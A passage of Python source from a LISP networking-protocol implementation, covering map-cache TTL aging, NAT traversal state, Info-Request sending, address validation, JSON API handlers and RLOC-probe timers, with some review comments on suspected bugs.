    return([info.global_etr_rloc, info.etr_port, new_rtr_set])
#enddef
#
# lisp_test_mr
#
# Send Map-Requests for arbitrary EIDs to (1) prime the map-cache and to (2)
# test the RTT of the Map-Resolvers.
#
def lisp_test_mr(lisp_sockets, port):
    """Send Map-Requests for arbitrary EIDs to prime the map-cache and
    measure Map-Resolver RTT, then re-arm itself on a periodic timer.

    NOTE: the bare 'return' below intentionally disables this function;
    everything after it is dead code kept for when the feature is
    re-enabled.
    """
    return
    lprint("Test Map-Resolvers")
    eid = lisp_address(LISP_AFI_IPV4, "", 0, 0)
    eid6 = lisp_address(LISP_AFI_IPV6, "", 0, 0)
    #
    # Send 10.0.0.1 and 192.168.0.1
    #
    eid.store_address("10.0.0.1")
    lisp_send_map_request(lisp_sockets, port, None, eid, None)
    eid.store_address("192.168.0.1")
    lisp_send_map_request(lisp_sockets, port, None, eid, None)
    #
    # Send 0100::1 and 8000::1.
    #
    eid6.store_address("0100::1")
    lisp_send_map_request(lisp_sockets, port, None, eid6, None)
    eid6.store_address("8000::1")
    lisp_send_map_request(lisp_sockets, port, None, eid6, None)
    #
    # Restart periodic timer. NOTE(review): lisp_test_mr_timer is
    # assigned as a local here, presumably shadowing a module-level
    # timer variable — confirm a 'global' statement isn't needed if
    # this code is ever re-enabled.
    #
    lisp_test_mr_timer = threading.Timer(LISP_TEST_MR_INTERVAL, lisp_test_mr,
        [lisp_sockets, port])
    lisp_test_mr_timer.start()
    return
#enddef
#
# lisp_update_local_rloc
#
# Check if local RLOC has changed and update the lisp_rloc() entry in
# lisp_db(). That is check to see if the private address changed since this
# ETR could have moved to another NAT or the same NAT device reassigned a
# new private address.
#
# This function is also used when the interface address is not private. It
# allows us to change the RLOC when the address changes.
#
def lisp_update_local_rloc(rloc):
    """
    Refresh rloc.rloc from the current address of its bound interface.
    Handles both a NAT handing out a new private address and an ordinary
    interface address change. Also records the new address as this node's
    primary RLOC in lisp_myrlocs[0]. No-op when the RLOC has no interface
    or the interface has no address.
    """
    if (rloc.interface == None): return

    latest = lisp_get_interface_address(rloc.interface)
    if (latest == None): return

    current_str = rloc.rloc.print_address_no_iid()
    latest_str = latest.print_address_no_iid()
    if (current_str == latest_str): return

    lprint("Local interface address changed on {} from {} to {}".format( \
        rloc.interface, current_str, latest_str))

    rloc.rloc.copy_address(latest)
    lisp_myrlocs[0] = latest
    return
#enddef
#
# lisp_update_encap_port
#
# Check to see if the encapsulation port changed for an RLOC for the supplied
# map-cache entry.
#
def lisp_update_encap_port(mc):
    """
    Walk the RLOC-set of map-cache entry 'mc' and refresh each RLOC's
    translated encapsulation port from the stored NAT state, logging any
    port change.
    """
    for rloc_entry in mc.rloc_set:
        state = lisp_get_nat_info(rloc_entry.rloc, rloc_entry.rloc_name)
        if (state == None): continue
        if (rloc_entry.translated_port == state.port): continue

        lprint(("Encap-port changed from {} to {} for RLOC {}, " + \
            "EID-prefix {}").format(rloc_entry.translated_port, state.port,
            red(rloc_entry.rloc.print_address_no_iid(), False),
            green(mc.print_eid_tuple(), False)))

        rloc_entry.store_translated_rloc(rloc_entry.rloc, state.port)
    #endfor
    return
#enddef
#
# lisp_timeout_map_cache_entry
#
# Check if a specific map-cache entry needs to be removed due timer expiry.
# If entry does not time out, go through RLOC-set to see if the encapsulation
# port needs updating.
#
# If "program-hardware = yes" is configured, then check a platform specific
# flag (an Arista platform specific command).
#
def lisp_timeout_map_cache_entry(mc, delete_list):
    """
    Age one map-cache entry. Entries with no TTL never expire and only get
    their NAT encap-port refreshed. Live entries refresh the encap-port
    too (unless they are Native-Forward, i.e. have an action). Expired
    entries are appended to 'delete_list' for removal after the walk.
    Always returns [True, delete_list] so it can serve as a walk_cache()
    callback.
    """
    if (mc.map_cache_ttl == None):
        lisp_update_encap_port(mc)
        return([True, delete_list])
    #endif

    #
    # Still inside the TTL window? Only LISP_NO_ACTION (non Native-Forward)
    # entries need the encap-port check.
    #
    if (mc.last_refresh_time + mc.map_cache_ttl > lisp_get_timestamp()):
        if (mc.action == LISP_NO_ACTION): lisp_update_encap_port(mc)
        return([True, delete_list])
    #endif

    #
    # TTL expired. Log and queue for deletion (deleting during the walk
    # would corrupt the cache iteration).
    #
    uptime_str = lisp_print_elapsed(mc.last_refresh_time)
    eid_str = mc.print_eid_tuple()
    lprint("Map-cache entry for EID-prefix {} has {}, had uptime of {}". \
        format(green(eid_str, False), bold("timed out", False), uptime_str))

    delete_list.append(mc)
    return([True, delete_list])
#enddef
#
# lisp_timeout_map_cache_walk
#
# Walk the entries in the lisp_map_cache(). And then subsequently walk the
# entries in lisp_mapping.source_cache().
#
def lisp_timeout_map_cache_walk(mc, parms):
    """
    walk_cache() callback for aging the map-cache. 'parms' is
    [delete_list, checkpoint_list]. Destination-only entries are aged
    directly and checkpointed when they survive; (S,G) entries recurse
    into their per-source cache.
    """
    expired = parms[0]
    checkpointed = parms[1]

    #
    # Destination-only state lives in this entry itself.
    #
    if (mc.group.is_null()):
        status, expired = lisp_timeout_map_cache_entry(mc, expired)

        #
        # Entry survived if it is not the one just appended to the
        # delete-list. lisp_write_checkpoint_entry() presumably appends in
        # place, so rebinding the local is sufficient here.
        #
        survived = (expired == [] or expired[-1] != mc)
        if (survived):
            checkpointed = lisp_write_checkpoint_entry(checkpointed, mc)
        #endif
        return([status, parms])
    #endif

    if (mc.source_cache == None): return([True, parms])

    #
    # (source, group) state: age every source under this group entry.
    #
    parms = mc.source_cache.walk_cache(lisp_timeout_map_cache_entry, parms)
    return([True, parms])
#enddef
#
# lisp_timeout_map_cache
#
# Look at TTL expiration for each map-cache entry.
#
def lisp_timeout_map_cache(lisp_map_cache):
    """
    Age the entire map-cache by TTL. Walks every entry collecting expired
    entries and checkpoint data, then deletes the expired entries and
    writes the checkpoint file with the survivors.
    """
    results = lisp_map_cache.walk_cache(lisp_timeout_map_cache_walk, [[], []])

    #
    # Delete the timed-out entries collected during the walk.
    #
    for entry in results[0]: entry.delete_cache()

    #
    # Persist the surviving entries to the checkpoint file.
    #
    lisp_checkpoint(results[1])
    return
#enddef
#
# lisp_store_nat_info
#
# Store source RLOC and port number of an Info-Request packet sent to port
# 4341 where the packet was translated by a NAT device.
#
# The lisp_nat_state_info{} is a dictionary array with an array a lisp_nat_
# info() values. We keep all the current and previous NAT state associated
# with the Info-Request hostname. This is so we can track how much movement
# is occuring.
#
# Return True if the address and port number changed so the caller can fix up
# RLOCs in map-cache entries.
#
def lisp_store_nat_info(hostname, rloc, port):
    """
    Record the translated RLOC and port seen in an Info-Request that
    traversed a NAT. lisp_nat_state_info[hostname] is kept youngest-first;
    all current and previous NAT state is retained so movement can be
    tracked. Returns True when the (address, port) changed so the caller
    can fix up RLOCs in map-cache entries, False on a pure refresh.
    """
    addr_str = rloc.print_address_no_iid()
    msg = "{} NAT state for {}, RLOC {}, port {}".format("{}",
        blue(hostname, False), red(addr_str, False), port)

    fresh = lisp_nat_info(addr_str, hostname, port)

    if ((hostname in lisp_nat_state_info) == False):
        lisp_nat_state_info[hostname] = [fresh]
        lprint(msg.format("Store initial"))
        return(True)
    #endif

    #
    # Element 0 is the youngest entry; a match there is just a refresh.
    #
    youngest = lisp_nat_state_info[hostname][0]
    if (youngest.address == addr_str and youngest.port == port):
        youngest.uptime = lisp_get_timestamp()
        lprint(msg.format("Refresh existing"))
        return(False)
    #endif

    #
    # State differs from the youngest. If it matches an older entry, pull
    # that one out; either way the new state is prepended.
    #
    stale = None
    for candidate in lisp_nat_state_info[hostname]:
        if (candidate.address == addr_str and candidate.port == port):
            stale = candidate
            break
        #endif
    #endfor

    if (stale == None):
        lprint(msg.format("Store new"))
    else:
        lisp_nat_state_info[hostname].remove(stale)
        lprint(msg.format("Use previous"))
    #endif

    lisp_nat_state_info[hostname] = [fresh] + lisp_nat_state_info[hostname]
    return(True)
#enddef
#
# lisp_get_nat_info
#
# Do lookup to get port number to store in map-cache entry as the encapsulation
# port.
#
def lisp_get_nat_info(rloc, hostname):
    """
    Return the stored lisp_nat_info() entry matching 'rloc' for
    'hostname', or None. Used to find the encapsulation port to put in a
    map-cache entry.
    """
    if ((hostname in lisp_nat_state_info) == False): return(None)

    addr_str = rloc.print_address_no_iid()
    for entry in lisp_nat_state_info[hostname]:
        if (entry.address == addr_str): return(entry)
    #endfor
    return(None)
#enddef
#
# lisp_build_info_requests
#
# Check database-mappings to see if there are any private local RLOCs. If
# so, get the translated global RLOC by sending an Info-Request to a
# Map-Server.
#
# To support multi-homing, that is more than one "interface = <device>"
# rloc sub-command clause, you need the following default routes in the
# kernel so Info-Requests can be load-split across interfaces:
#
# sudo ip route add default via <next-hop> dev eth0
# sudo ip route append default via <another-or-same-next-hop> dev eth1
#
# By having these default routes, we can get the next-hop address for the
# NAT interface we are sending the 4341 Info-Request to install a emphemeral
# static route to force the Info-Request to go out a specific interface.
#
def lisp_build_info_requests(lisp_sockets, dest, port):
    """
    Send Info-Requests so NAT-traversed interfaces learn their translated
    global RLOC. When 'dest' is None the requests go to all configured
    Map-Resolvers (falling back to Map-Servers); otherwise only to 'dest'.
    'port' is the source port to use. No-op unless NAT traversal is
    enabled.
    """
    if (lisp_nat_traversal == False): return
    #
    # Send Info-Request to each configured Map-Resolver and exit loop.
    # If we don't find one, try finding a Map-Server. We may send Info-
    # Request to an RTR to open up NAT state.
    #
    dest_list = []
    mr_list = []
    if (dest == None):
        for mr in lisp_map_resolvers_list.values():
            mr_list.append(mr.map_resolver)
        #endif
        dest_list = mr_list
        if (dest_list == []):
            for ms in lisp_map_servers_list.values():
                dest_list.append(ms.map_server)
            #endfor
        #endif
        if (dest_list == []): return
    else:
        dest_list.append(dest)
    #endif
    #
    # Find the NAT-traversed interfaces: database-mapping RLOCs that are
    # bound to an interface and currently have an address. De-duplicate by
    # address string.
    #
    rloc_list = {}
    for db in lisp_db_list:
        for rloc_entry in db.rloc_set:
            lisp_update_local_rloc(rloc_entry)
            if (rloc_entry.rloc.is_null()): continue
            if (rloc_entry.interface == None): continue
            addr = rloc_entry.rloc.print_address_no_iid()
            if (addr in rloc_list): continue
            rloc_list[addr] = rloc_entry.interface
        #endfor
    #endfor
    if (rloc_list == {}):
        lprint('Suppress Info-Request, no "interface = <device>" RLOC ' + \
            "found in any database-mappings")
        return
    #endif
    #
    # Send out Info-Requests out the NAT-traversed interfaces that have
    # addresses assigned on them. Only pin the egress device when there is
    # more than one candidate interface (multi-homing).
    #
    for addr in rloc_list:
        interface = rloc_list[addr]
        a = red(addr, False)
        lprint("Build Info-Request for private address {} ({})".format(a,
            interface))
        device = interface if len(rloc_list) > 1 else None
        for dest in dest_list:
            lisp_send_info_request(lisp_sockets, dest, port, device)
        #endfor
    #endfor
    #
    # Do DNS lookup for Map-Resolver if "dns-name" configured.
    #
    if (mr_list != []):
        for mr in lisp_map_resolvers_list.values():
            mr.resolve_dns_name()
        #endfor
    #endif
    return
#enddef
#
# lisp_valid_address_format
#
# Check to see if the string is a valid address. We are validating IPv4, IPv6
# and MAC addresses.
#
def lisp_valid_address_format(kw, value):
    """
    Validate that 'value' is a syntactically correct address when keyword
    'kw' is "address"; any other keyword is vacuously valid. Recognized
    formats: single-quoted distinguished-names, IPv4 dotted-decimal,
    geo-prefixes (contain N/S/W/E components), MACs (xxxx-xxxx-xxxx),
    IPv6, and E.164 ("+" followed by BCD digits). Returns True/False.
    """
    if (kw != "address"): return(True)
    #
    # Fix: an empty value would raise IndexError on the value[0] tests
    # below; it is not a valid address of any kind.
    #
    if (value == ""): return(False)
    #
    # Check if address is a Distinguished-Name. Must have single quotes.
    # Check this first because names could have ".", ":", or "-" in them.
    #
    if (value[0] == "'" and value[-1] == "'"): return(True)
    #
    # Do IPv4 test for dotted decimal x.x.x.x.
    #
    if (value.find(".") != -1):
        addr = value.split(".")
        if (len(addr) != 4): return(False)
        for byte in addr:
            if (byte.isdigit() == False): return(False)
            if (int(byte) > 255): return(False)
        #endfor
        return(True)
    #endif
    #
    # Test for a geo-prefix. They have N, S, W, E characters in them.
    #
    if (value.find("-") != -1):
        addr = value.split("-")
        for i in ["N", "S", "W", "E"]:
            if (i in addr):
                if (len(addr) < 8): return(False)
                return(True)
            #endif
        #endfor
    #endif
    #
    # Do MAC test in format xxxx-xxxx-xxxx.
    #
    if (value.find("-") != -1):
        addr = value.split("-")
        if (len(addr) != 3): return(False)
        for hexgroup in addr:
            try: int(hexgroup, 16)
            except: return(False)
        #endfor
        return(True)
    #endif
    #
    # Do IPv6 test in format aaaa:bbbb::cccc:dddd. At most one "::" (the
    # double-null) is allowed, except for leading/trailing "::" which
    # produce two adjacent empty groups.
    #
    if (value.find(":") != -1):
        addr = value.split(":")
        if (len(addr) < 2): return(False)
        found_null = False
        count = 0
        for hexgroup in addr:
            count += 1
            if (hexgroup == ""):
                if (found_null):
                    if (len(addr) == count): break
                    if (count > 2): return(False)
                #endif
                found_null = True
                continue
            #endif
            try: int(hexgroup, 16)
            except: return(False)
        #endfor
        return(True)
    #endif
    #
    # Do E.164 format test. The address is a "+" followed by <= 15 BCD digits.
    #
    if (value[0] == "+"):
        addr = value[1::]
        for digit in addr:
            if (digit.isdigit() == False): return(False)
        #endfor
        return(True)
    #endif
    return(False)
#enddef
#
# lisp_process_api
#
# Used by all lisp processes (not the lisp-core process) to read data
# structures and return them to the LISP process.
#
# Variable data_structure has following format:
#
# "<data-structure-name>%{<dictionary-array-of-parameters>}"
#
def lisp_process_api(process, lisp_socket, data_structure):
    """
    Handle an API request from the lisp-core process. 'data_structure' is
    "<data-structure-name>%{<json-parameters>}". Gathers the requested
    data, JSON-encodes it, and sends it back to lisp-core over IPC.
    """
    api_name, parms = data_structure.split("%")

    lprint("Process API request '{}', parameters: '{}'".format(api_name,
        parms))

    data = []
    if (api_name == "map-cache"):
        if (parms == ""):
            data = lisp_map_cache.walk_cache(lisp_process_api_map_cache, data)
        else:
            data = lisp_process_api_map_cache_entry(json.loads(parms))
        #endif
    elif (api_name == "site-cache"):
        if (parms == ""):
            data = lisp_sites_by_eid.walk_cache(lisp_process_api_site_cache,
                data)
        else:
            data = lisp_process_api_site_cache_entry(json.loads(parms))
        #endif
    elif (api_name == "map-server"):
        parms = {} if (parms == "") else json.loads(parms)
        data = lisp_process_api_ms_or_mr(True, parms)
    elif (api_name == "map-resolver"):
        parms = {} if (parms == "") else json.loads(parms)
        data = lisp_process_api_ms_or_mr(False, parms)
    elif (api_name == "database-mapping"):
        data = lisp_process_api_database_mapping()
    #endif

    #
    # Send IPC back to lisp-core process.
    #
    ipc = lisp_api_ipc(process, json.dumps(data))
    lisp_ipc(ipc, lisp_socket, "lisp-core")
    return
#enddef
#
# lisp_process_api_map_cache
#
# Return map-cache to API caller.
#
def lisp_process_api_map_cache(mc, data):
    """
    walk_cache() callback that gathers map-cache entry data for the API.
    Destination-only entries are gathered directly; (S,G) entries recurse
    through their per-source cache.
    """
    if (mc.group.is_null() == False):
        if (mc.source_cache == None): return([True, data])

        #
        # (source, group) state: gather every source under this group.
        #
        data = mc.source_cache.walk_cache(lisp_gather_map_cache_data, data)
        return([True, data])
    #endif

    #
    # Destination-only state lives in this entry itself.
    #
    return(lisp_gather_map_cache_data(mc, data))
#enddef
#
# lisp_gather_map_cache_data
#
# Return map-cache to API caller.
#
def lisp_gather_map_cache_data(mc, data):
    """
    Serialize one map-cache entry 'mc' into a JSON-friendly dictionary and
    append it to 'data'. Returns [True, data] so it can be used as a
    walk_cache() callback.
    """
    entry = {}
    entry["instance-id"] = str(mc.eid.instance_id)
    entry["eid-prefix"] = mc.eid.print_prefix_no_iid()
    if (mc.group.is_null() == False):
        entry["group-prefix"] = mc.group.print_prefix_no_iid()
    #endif
    entry["uptime"] = lisp_print_elapsed(mc.uptime)
    # NOTE(review): "expires" is computed from mc.uptime, identical to
    # "uptime" above — looks like it should use a refresh/expiry
    # timestamp; confirm intent before changing.
    entry["expires"] = lisp_print_elapsed(mc.uptime)
    entry["action"] = lisp_map_reply_action_string[mc.action]
    # TTL is stored in seconds; reported in minutes.
    entry["ttl"] = "--" if mc.map_cache_ttl == None else \
        str(mc.map_cache_ttl / 60)
    #
    # Encode in RLOC-set which is an array of entries.
    #
    rloc_set = []
    for rloc in mc.rloc_set:
        r = {}
        if (rloc.rloc_exists()):
            r["address"] = rloc.rloc.print_address_no_iid()
        #endif
        if (rloc.translated_port != 0):
            r["encap-port"] = str(rloc.translated_port)
        #endif
        r["state"] = rloc.print_state()
        if (rloc.geo): r["geo"] = rloc.geo.print_geo()
        if (rloc.elp): r["elp"] = rloc.elp.print_elp(False)
        if (rloc.rle): r["rle"] = rloc.rle.print_rle(False, False)
        if (rloc.json): r["json"] = rloc.json.print_json(False)
        if (rloc.rloc_name): r["rloc-name"] = rloc.rloc_name
        stats = rloc.stats.get_stats(False, False)
        if (stats): r["stats"] = stats
        r["uptime"] = lisp_print_elapsed(rloc.uptime)
        r["upriority"] = str(rloc.priority)
        r["uweight"] = str(rloc.weight)
        r["mpriority"] = str(rloc.mpriority)
        r["mweight"] = str(rloc.mweight)
        reply = rloc.last_rloc_probe_reply
        if (reply):
            r["last-rloc-probe-reply"] = lisp_print_elapsed(reply)
            r["rloc-probe-rtt"] = str(rloc.rloc_probe_rtt)
        #endif
        r["rloc-hop-count"] = rloc.rloc_probe_hops
        r["recent-rloc-hop-counts"] = rloc.recent_rloc_probe_hops
        recent_rtts = []
        for rtt in rloc.recent_rloc_probe_rtts: recent_rtts.append(str(rtt))
        r["recent-rloc-probe-rtts"] = recent_rtts
        rloc_set.append(r)
    #endfor
    entry["rloc-set"] = rloc_set
    data.append(entry)
    return([True, data])
#enddef
#
# lisp_process_api_map_cache_entry
#
# Parse API parameters in dictionary array, do longest match lookup.
#
def lisp_process_api_map_cache_entry(parms):
    """
    API handler for a single map-cache lookup. 'parms' is a dictionary
    carrying "instance-id", "eid-prefix", and optionally "group-prefix".
    Performs a longest-match lookup and returns the gathered entry data.
    """
    iid = parms["instance-id"]
    iid = 0 if (iid == "") else int(iid)

    #
    # Parse EID. When a group lookup is requested the EID becomes the
    # source and the group becomes the destination.
    #
    eid = lisp_address(LISP_AFI_NONE, "", 0, iid)
    eid.store_prefix(parms["eid-prefix"])
    source = eid
    dest = eid

    group = lisp_address(LISP_AFI_NONE, "", 0, iid)
    if ("group-prefix" in parms):
        group.store_prefix(parms["group-prefix"])
        dest = group
    #endif

    data = []
    mc = lisp_map_cache_lookup(source, dest)
    if (mc): status, data = lisp_process_api_map_cache(mc, data)
    return(data)
#enddef
#
# lisp_process_api_site_cache
#
# Return map-cache to API caller.
#
def lisp_process_api_site_cache(se, data):
    """
    walk_cache() callback that gathers site-cache entry data for the API.
    Destination-only entries are gathered directly; (S,G) entries recurse
    through their per-source cache.
    """
    if (se.group.is_null() == False):
        if (se.source_cache == None): return([True, data])

        #
        # (source, group) state: gather every source under this group.
        #
        data = se.source_cache.walk_cache(lisp_gather_site_cache_data, data)
        return([True, data])
    #endif

    #
    # Destination-only state lives in this entry itself.
    #
    return(lisp_gather_site_cache_data(se, data))
#enddef
#
# lisp_process_api_ms_or_mr
#
# Return map-cache to API caller.
#
def lisp_process_api_ms_or_mr(ms_or_mr, data):
    """
    Return state for the first configured map-server (ms_or_mr True) or
    map-resolver (False) that matches the "dns-name" or "address" filter
    in 'data'. Returns a one-element array, or [] when nothing matches.
    """
    address = lisp_address(LISP_AFI_NONE, "", 0, 0)
    dns_name = data["dns-name"] if ("dns-name" in data) else None
    if ("address" in data):
        address.store_address(data["address"])
    #endif

    value = {}
    if (ms_or_mr):
        for ms in lisp_map_servers_list.values():
            #
            # Filter by dns-name when supplied, else by exact address.
            #
            if (dns_name):
                if (dns_name != ms.dns_name): continue
            else:
                if (address.is_exact_match(ms.map_server) == False): continue
            #endif

            value["dns-name"] = ms.dns_name
            value["address"] = ms.map_server.print_address_no_iid()
            value["ms-name"] = "" if ms.ms_name == None else ms.ms_name
            return([value])
        #endfor
        return([])
    #endif

    for mr in lisp_map_resolvers_list.values():
        if (dns_name):
            if (dns_name != mr.dns_name): continue
        else:
            if (address.is_exact_match(mr.map_resolver) == False): continue
        #endif

        value["dns-name"] = mr.dns_name
        value["address"] = mr.map_resolver.print_address_no_iid()
        value["mr-name"] = "" if mr.mr_name == None else mr.mr_name
        return([value])
    #endfor
    return([])
#enddef
#
# lisp_process_api_database_mapping
#
# Return array of database-mappings configured, include dynamic data like
# translated_rloc in particular.
#
def lisp_process_api_database_mapping():
    """
    Return an array describing each configured database-mapping,
    including dynamic data such as any NAT translated-RLOC.
    """
    data = []
    for db in lisp_db_list:
        entry = {}
        entry["eid-prefix"] = db.eid.print_prefix()
        if (db.group.is_null() == False):
            entry["group-prefix"] = db.group.print_prefix()
        #endif

        rloc_array = []
        for rloc_entry in db.rloc_set:
            r = {}
            if (rloc_entry.rloc.is_null() == False):
                r["rloc"] = rloc_entry.rloc.print_address_no_iid()
            #endif
            if (rloc_entry.rloc_name != None):
                r["rloc-name"] = rloc_entry.rloc_name
            #endif
            if (rloc_entry.interface != None):
                r["interface"] = rloc_entry.interface
            #endif
            translated = rloc_entry.translated_rloc
            if (translated.is_null() == False):
                r["translated-rloc"] = translated.print_address_no_iid()
            #endif
            if (r != {}): rloc_array.append(r)
        #endfor

        #
        # Add RLOCs array to EID entry, then the entry to the result.
        #
        entry["rlocs"] = rloc_array
        data.append(entry)
    #endfor
    return(data)
#enddef
#
# lisp_gather_site_cache_data
#
# Return site-cache to API caller.
#
def lisp_gather_site_cache_data(se, data):
    """
    Serialize one site-cache entry 'se' into a JSON-friendly dictionary
    and append it to 'data'. Returns [True, data] so it can be used as a
    walk_cache() callback.
    """
    entry = {}
    entry["site-name"] = se.site.site_name
    entry["instance-id"] = str(se.eid.instance_id)
    entry["eid-prefix"] = se.eid.print_prefix_no_iid()
    if (se.group.is_null() == False):
        entry["group-prefix"] = se.group.print_prefix_no_iid()
    #endif
    entry["registered"] = "yes" if se.registered else "no"
    entry["first-registered"] = lisp_print_elapsed(se.first_registered)
    entry["last-registered"] = lisp_print_elapsed(se.last_registered)
    addr = se.last_registerer
    addr = "none" if addr.is_null() else addr.print_address()
    entry["last-registerer"] = addr
    # "ams" = accept-more-specifics.
    entry["ams"] = "yes" if (se.accept_more_specifics) else "no"
    entry["dynamic"] = "yes" if (se.dynamic) else "no"
    entry["site-id"] = str(se.site_id)
    if (se.xtr_id_present):
        entry["xtr-id"] = "0x"+ lisp_hex_string(se.xtr_id)
    #endif
    #
    # Encode in RLOC-set which is an array of entries.
    #
    rloc_set = []
    for rloc in se.registered_rlocs:
        r = {}
        r["address"] = rloc.rloc.print_address_no_iid() if rloc.rloc_exists() \
            else "none"
        if (rloc.geo): r["geo"] = rloc.geo.print_geo()
        if (rloc.elp): r["elp"] = rloc.elp.print_elp(False)
        if (rloc.rle): r["rle"] = rloc.rle.print_rle(False, True)
        if (rloc.json): r["json"] = rloc.json.print_json(False)
        if (rloc.rloc_name): r["rloc-name"] = rloc.rloc_name
        r["uptime"] = lisp_print_elapsed(rloc.uptime)
        r["upriority"] = str(rloc.priority)
        r["uweight"] = str(rloc.weight)
        r["mpriority"] = str(rloc.mpriority)
        r["mweight"] = str(rloc.mweight)
        rloc_set.append(r)
    #endfor
    entry["registered-rlocs"] = rloc_set
    data.append(entry)
    return([True, data])
#enddef
#
# lisp_process_api_site_cache_entry
#
# Parse API parameters in dictionary array, do longest match lookup.
#
def lisp_process_api_site_cache_entry(parms):
    """
    API handler for a single site-cache lookup. 'parms' carries
    "instance-id", "eid-prefix", and optionally "group-prefix". Does a
    longest-match site lookup and returns the gathered data array.
    """
    iid = parms["instance-id"]
    iid = 0 if (iid == "") else int(iid)

    #
    # Parse EID, and group when a (S,G) lookup is requested.
    #
    eid = lisp_address(LISP_AFI_NONE, "", 0, iid)
    eid.store_prefix(parms["eid-prefix"])

    group = lisp_address(LISP_AFI_NONE, "", 0, iid)
    if ("group-prefix" in parms):
        group.store_prefix(parms["group-prefix"])
    #endif

    data = []
    se = lisp_site_eid_lookup(eid, group, False)
    if (se): lisp_gather_site_cache_data(se, data)
    return(data)
#enddef
#
# lisp_get_interface_instance_id
#
# Return instance-ID from lisp_interface() class.
#
def lisp_get_interface_instance_id(device, source_eid):
    """
    Return the instance-ID to use for packets arriving on 'device'.
    Falls back to lisp_default_iid when no "lisp interface" is configured
    for the device. For multi-tenant interfaces, 'source_eid' (may be
    None) is longest-matched against each tenant prefix to select the
    tenant's instance-ID.
    """
    interface = None
    if (lisp_myinterfaces.has_key(device)):
        interface = lisp_myinterfaces[device]
    #endif
    #
    # Didn't find an instance-ID configured on a "lisp interface", return
    # the default.
    #
    if (interface == None or interface.instance_id == None):
        return(lisp_default_iid)
    #endif
    #
    # If there is a single interface data structure for a given device,
    # return the instance-ID conifgured for it. Otherwise, check to see
    # if this is a multi-tenant EID-prefix. And then test all configured
    # prefixes in each lisp_interface() for a best match. This allows
    # for multi-tenancy on a single xTR interface.
    #
    iid = interface.get_instance_id()
    if (source_eid == None): return(iid)
    # source_eid.instance_id is temporarily overwritten so the
    # is_more_specific() comparisons run within each tenant's IID; it is
    # restored below before returning.
    save_iid = source_eid.instance_id
    best = None
    for interface in lisp_multi_tenant_interfaces:
        if (interface.device != device): continue
        prefix = interface.multi_tenant_eid
        source_eid.instance_id = prefix.instance_id
        if (source_eid.is_more_specific(prefix) == False): continue
        if (best == None or best.multi_tenant_eid.mask_len < prefix.mask_len):
            best = interface
        #endif
    #endfor
    source_eid.instance_id = save_iid
    if (best == None): return(iid)
    return(best.get_instance_id())
#enddef
#
# lisp_allow_dynamic_eid
#
# Returns dynamic-eid-deivce (or device if "dynamic-eid-device" not configured)
# if supplied EID matches configured dynamic-EID in a "lisp interface" command.
# Otherwise, returns None.
#
def lisp_allow_dynamic_eid(device, eid):
    """
    If 'eid' matches a dynamic-EID prefix configured on "lisp interface"
    'device', return the device to use for it (the configured
    "dynamic-eid-device" when present, else 'device'). Otherwise None.
    """
    if ((device in lisp_myinterfaces) == False): return(None)

    interface = lisp_myinterfaces[device]
    if (interface.does_dynamic_eid_match(eid) == False): return(None)

    if (interface.dynamic_eid_device == None): return(device)
    return(interface.dynamic_eid_device)
#enddef
#
# lisp_start_rloc_probe_timer
#
# Set the RLOC-probe timer to expire in 1 minute (by default).
#
def lisp_start_rloc_probe_timer(interval, lisp_sockets):
    """
    (Re)arm the global RLOC-probe timer to fire in 'interval' seconds,
    canceling any previously pending timer first.
    """
    global lisp_rloc_probe_timer

    if (lisp_rloc_probe_timer != None): lisp_rloc_probe_timer.cancel()

    lisp_rloc_probe_timer = threading.Timer(interval,
        lisp_process_rloc_probe_timer, [lisp_sockets])
    lisp_rloc_probe_timer.start()
    return
#enddef
#
# lisp_show_rloc_probe_list
#
# Print out the lisp_show_rloc_probe_list in a readable way for debugging.
#
def lisp_show_rloc_probe_list():
    """
    Debug helper: dump lisp_rloc_probe_list in a readable form, one line
    per (rloc, eid, group) tuple keyed by RLOC address.
    """
    lprint(bold("----- RLOC-probe-list -----", False))
    for key in lisp_rloc_probe_list:
        lprint("RLOC {}:".format(key))
        for r, e, g in lisp_rloc_probe_list[key]:
            lprint("  [{}, {}, {}, {}]".format(hex(id(r)), e.print_prefix(),
                g.print_prefix(), r.translated_port))
        #endfor
    #endfor
    lprint(bold("---------------------------", False))
    return
#enddef
#
# lisp_mark_rlocs_for_other_eids
#
# When the parent RLOC that we have RLOC-probe state for comes reachable or
# goes unreachable, set the state appropriately for other EIDs using the SAME
# RLOC. The parent is the first RLOC in the eid-list.
#
def lisp_mark_rlocs_for_other_eids(eid_list):
    """
    When the parent RLOC (first element of 'eid_list') goes unreachable,
    mark the same RLOC unreachable for every other EID that uses it, log
    the change for each EID, and push the updated RLOC-sets to the
    external data-plane via IPC.
    """
    #
    # Don't process parent but put its EID in printed list.
    #
    rloc, e, g = eid_list[0]
    eids = [lisp_print_eid_tuple(e, g)]
    for rloc, e, g in eid_list[1::]:
        rloc.state = LISP_RLOC_UNREACH_STATE
        rloc.last_state_change = lisp_get_timestamp()
        eids.append(lisp_print_eid_tuple(e, g))
    #endfor
    unreach = bold("unreachable", False)
    # Note: 'rloc' here is the loop variable left over from the for loop
    # above (or the parent's RLOC when eid_list has one element); all
    # tuples share the same RLOC address, so any of them prints the same.
    rloc_str = red(rloc.rloc.print_address_no_iid(), False)
    for eid in eids:
        e = green(eid, False)
        lprint("RLOC {} went {} for EID {}".format(rloc_str, unreach, e))
    #endfor
    #
    # For each EID, tell external data-plane about new RLOC-set (RLOCs minus
    # the ones that just went unreachable).
    #
    for rloc, e, g in eid_list:
        mc = lisp_map_cache.lookup_cache(e, True)
        if (mc): lisp_write_ipc_map_cache(True, mc)
    #endfor
    return
#enddef
#
# lisp_process_rloc_probe_timer
#
# Periodic RLOC-probe timer has expired. Go through cached RLOCs from map-
# cache and decide to suppress or rate-limit RLOC-probes. This function
# is also used to time out "unreachability" state so we can start RLOC-probe
# a previously determined unreachable RLOC.
#
def lisp_process_rloc_probe_timer(lisp_sockets):
    """
    Periodic RLOC-probe timer handler. Re-arms the timer, then walks
    lisp_rloc_probe_list deciding per RLOC whether to suppress,
    rate-limit, or send an RLOC-probe Map-Request. Also ages
    "unreachable" state so previously-down RLOCs get probed again, and
    handles egress multi-homing by steering probes out specific
    next-hops with temporary host routes.
    """
    lisp_set_exception()
    lisp_start_rloc_probe_timer(LISP_RLOC_PROBE_INTERVAL, lisp_sockets)
    if (lisp_rloc_probing == False): return
    #
    # Debug code. Must rebuild image to set boolean to True.
    #
    if (lisp_print_rloc_probe_list): lisp_show_rloc_probe_list()
    #
    # Check for egress multi-homing.
    #
    default_next_hops = lisp_get_default_route_next_hops()
    lprint("---------- Start RLOC Probing for {} entries ----------".format( \
